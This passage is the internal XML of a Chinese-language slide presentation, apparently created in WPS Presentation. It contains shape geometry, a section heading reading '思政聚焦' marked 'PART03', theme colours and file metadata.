            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="4115435">
                <a:moveTo>
                  <a:pt x="0" y="11177"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6837" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="17692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="27429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="39190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="52922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="68574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="86095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="105434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="126538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="149357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="173839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="199932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="227586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="256749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="287369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="319395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="352776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="387459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="423395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="460531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="498816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="538198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="578627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="620050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="662416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="705675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="749774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="794661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="840287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="886598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127580" y="933545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="4114863"/>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2" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4914900"/>
            <a:ext cx="2038350" cy="1762125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2038350" h="1762125">
                <a:moveTo>
                  <a:pt x="0" y="1762125"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2038350" y="1762125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2038350" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1762125"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="61817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4" name="AutoShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="66770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5" name="AutoShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6343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6" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6515100"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779"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AutoShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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8" name="AutoShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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157162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0" name="Freeform 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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1" name="AutoShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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2" name="AutoShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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132397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4" name="Freeform 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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5" name="AutoShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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6" name="AutoShape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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7" name="AutoShape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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8" name="Freeform 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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9" name="AutoShape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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0" name="AutoShape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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1" name="AutoShape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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2" name="Freeform 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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3" name="AutoShape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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4" name="AutoShape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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5" name="AutoShape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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6" name="Freeform 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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7" name="AutoShape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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8" name="AutoShape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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9" name="AutoShape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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0" name="Freeform 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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1" name="AutoShape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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2" name="AutoShape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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3" name="AutoShape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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4" name="Freeform 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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5" name="TextBox 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3123945"/>
            <a:ext cx="5697855" cy="1029335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="14002" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>思政聚焦</a:t>
            </a:r>
            <a:endPar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56" name="Freeform 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="2581275"/>
            <a:ext cx="762000" cy="85725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="762000" h="85725">
                <a:moveTo>
                  <a:pt x="719074" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42799" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12541" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26146" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42799" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="82359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="73183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="59578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="762000" y="42925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758632" y="26199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749442" y="12557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="735800" y="3367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719074"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57" name="TextBox 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124195" y="1904999"/>
            <a:ext cx="1943608" cy="575310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>PART03</a:t>
            </a:r>
            <a:endPar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58" name="AutoShape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9001125" y="257175"/>
            <a:ext cx="2905125" cy="42862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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/tags/tag1.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ISLIDE.DIAGRAM" val="#472308"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ISLIDE.DIAGRAM" val="#472308"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ISLIDE.DIAGRAM" val="#472308"/>
</p:tagLst>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2F89C9"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="2F89C9"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="2F89C9"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="2F89C9"/>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11791</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>627</Paragraphs>
  <Slides>66</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66</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="74" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</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唐唐</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-13T08:20:31Z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F5C42596590A4F42AC2FE5FF6BD17032</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.8.2.12265</vt:lpwstr>
  </property>
</Properties>
</file>